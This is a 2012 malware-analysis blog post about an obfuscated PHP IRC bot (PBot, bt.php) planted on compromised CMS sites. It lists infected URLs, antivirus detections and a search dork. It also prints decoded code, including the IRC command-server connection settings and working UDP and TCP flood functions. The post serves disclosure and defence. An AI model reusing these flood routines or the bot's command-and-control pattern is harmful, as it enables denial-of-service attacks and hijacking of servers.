Tuesday, September 4, 2012

Cracking of Strong Encrypted PHP / IRC Bot (PBOT) with TCP / UDP (DoS) Flooder + Backdoor (bt.php)

This is a quickie, found the infection of this PHP/IRC Bot or PBot at about the 
same time just now at the below URLs
hxxp://www.hoopsavvy.com/mods//bt.php hxxp://www.gepec.cat/mods//bt.php hxxp://www.cyclocentrum.pl/mods//bt.php http://www.yallastore.com/OS%20Commerce/images/pb.jpg.php hxxp://my.smouth.com/mods//bt.php
The last one URL is under reports & someone is doing quick job to take it down- then rest is on the way to go. These are the same stuffs, an IRC PHP/Bot, currently can be detected by the Virus Total checks with the below result:
MD5: 61cfa5c0f84d014fe0e61ebbcb27c469 File size: 16.5 KB ( 16904 bytes ) File name: bt.php File type: PHP/text DetRatio: 12 / 42 Date: 2012-09-04 05:47:54 UTC ( 0 分 ago ) URL:---->>>[CLICK] Malware Names: F-Prot : PHP/Pbot.G VIPRE : Backdoor.PHP.IRCBot.bu (v) AntiVir : PHP/PBot.A McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G Emsisoft : Backdoor.PHP.IRCBot!IK ClamAV : PHP.Bot-1 GData : PHP:IRCBot-AC Microsoft : Backdoor:PHP/IRCbot.F Ikarus : Backdoor.PHP.IRCBot Commtouch : PHP/Pbot.G K7AntiVirus : Backdoor Avast : PHP:IRCBot-AC [Trj]
↑not bad for the detection ratio, even-though strongly encrypted. better than I expected 12 AntiVirus products can detect this malware. Well it is nothing new, it's actually the PHP/IRC Bot file which was injected to - some vulnerable web base CMS (Wordpress/Joomla/etc) which can be executed via - malicious URL like I found in the Google DORK like below:
(1) hxxp://www.kvon.com/index.php?p=http:/xxx/mods/bt.php? ^^^^^^^^^^^^^ ↑watch for this service! (2) Or access/execute directly the infected url from the IRC shell command.
This evil code was spread by gang.sexpil.net, a to some linux bots. Some are hosted in US at Truckee Softcom America Inc network & was starting infection this similar script since firstly detected on May this year. If found massive infection of this code at here and there, mostly WordPress, and looks like noone decode/decrypt this code, so I did it. Same ones, was named gangbang.angels-agency.nl or gangbang.mytijn.org - If you use these mentioned 3 keywords in Google DORK you can get as much info as possible to trace the infections & their infected codes. Boy, how they like wording like "gang" or "gangbang" ;-) (Hint!) Another way to monitor the infection of this Pbot is using DORK w/below command:
"inurl:/mods/bt.php"
So what's so special about this Pbot? If you see inside of this file you'll find encrypted texts(not too so special either), you can see the pastebin of the full code here-->>[CLICK] in case the hosts are down. The POINT is, this time, the way this PBot was encrypted is a new one, let me explain further: Usually the PHP/IRC Bot using encoded text w/ base64_decode() or str_rot13() or- the cascaded/combination of it, but this one is different. Let's see the snip header of this code:
<?php set_time_limit(0); session_start(); error_reporting(0); class qEZkBKNkBEhhZNKkB { /* YEzzSKr0Y0SXAUUZx2eDq6j8hFtH7BIW58lNJDExtnlU75KvXOYeL8 dSDwqBXZoTYAxx32Vnf68 */ var $hhnwhekTEZHQbqh = array("EqqhZeqBHwKEktQN"=>"gang.sexpil.net", "BZZZ"=>"43000", "eehWH"=>"scary", "eEzhWH"=>"13", "KkZQkbh"=>"#wWw#", "KKE"=>"scan", "tqNNeBnbB"=>"41aa15390e2efa34ac693c3bd7cb8e88", "khEtenzHNE"=>".", "BwqNthWtnHb"=>"a87710e60dee7645081a8fc2fab74dbd"); var $users = array(); /* CC33EDub4mmxOITIemebmdXgv2Tdxiv0LoTfSehNqta41UC66H8iKV p5N89bhu1SJLYrP545p5Z */ function gjPsjVGDJm($to,$msg) { $this->sMDDmyG("NOTICE $to :$msg"); } function sAaMMVvp($host) { unset($this->users[$host]); } function AVaJpJVggMJVj() { if(!($this->xLrFucxxR = fsockopen($this->hhnwhekTEZHQbqh['EqqhZeqBHwKEktQN'], $this->hhnwhekTEZHQbqh['BZZZ'],$e,$s,30))) $this->AVaJpJVggMJVj(); $this->gmpMAGVVjVJVSdjyJ(); if(strlen($this->hhnwhekTEZHQbqh['eehWH'])>0) $this->sMDDmyG("PASS ".$this->hhnwhekTEZHQbqh['eehWH']); $this->DGvAsjsSmgpPAyJJ(); $this->VmGpdmJsymmagm(); } : : // and so on...
It actually uses the encryption key/chiper to crack this kind of code. maybe someone w/CTF skills at DefCon would lend a hand for this to crack it faster, but w/my average skills I did crack this in say within 45 minutes... The result was like this :
class pBot { var $config = array("server"=>"gang.sexpil.net", "port"=>"43000", "pass"=>"scary", "maxrand"=>"13", "chan"=>"#wWw#", "key"=>"scan", "password"=>"41aa15390e2efa34ac693c3bd7cb8e88", "trigger"=>".", "hostauth"=>"a87710e60dee7645081a8fc2fab74dbd"); var $users = array(); function notice($to,$msg) { $this->send("NOTICE $to :$msg"); } function log_out($host) { unset($this->users[$host]); } function start() { if(!($this->conn = fsockopen($this->config['server'], $this->config['port'],$e,$s,30))) $this->start(); $this->set_ident(); if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']); $this->set_nick(); $this->main(); function log_in($host) { $this->users[$host] = true; } function udpflood($host,$packetsize,$time) { $this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); } function hostinfo() { if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "\0034ON\003"; } else { $safemode = "\0039OFF\003"; } $unme = php_uname(); if($unme == "") { $mname = "\00315---\003"; } else { $mname = "\00315".$unme."\003"; } $url = "\00315http://".$_SERVER['SERVER_NAME']." ".$_SERVER['REQUEST_URI']."\003"; $pth = "\00315".getcwd()."\003"; $pthh = getcwd().""; $perms = fileperms("$pthh"); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } } function privmsg($to,$msg) { $this->send("PRIVMSG $to :$msg"); } : // and so on... ;-)
As per snipped decoded script above it has the login environments to IRC thus the code for launching DoS via UDP Flood. then operations of taking and sending out credentials of infected host.. After decoded it right you'll also see the TCP flood function below:
function tcpflood($host,$packets,$packetsize,$port,$delay) { $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); $packet = ""; for($i=0;$i<$packetsize;$i++) $packet .= chr(mt_rand(1,256)); for($i=0;$i<$packets;$i++) { if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) { $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); return 0; } else { fwrite($fp,$packet); fclose($fp); } sleep($delay); } $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); }
And of course the longest part of the code is control system of this bot- via IRC channels, like nicknaming, commanding and etc etc.. Based on the language they are using it is coded by a Dutch coder, it has this text
Kon bestand niet downloaden. Toestemming geweigerd (Could not download file. permission denied)
So what is thing Pbot does and what should we care?
1. Hacker injected your CMS with this script for the remote execution. 2. It can be used to Flood/DoS other machines cia IRC control. 3. It sends your credential of to the mother ships via IRC channel 4. Letting this evil code in your server can make your service blacklisted for the DoS attack you never even commit.
Just let me know if you need a full decoded code, but that is - AFTER you are proving me that you are not one of "them" ;-) (no offense)
#MalwareMustDie!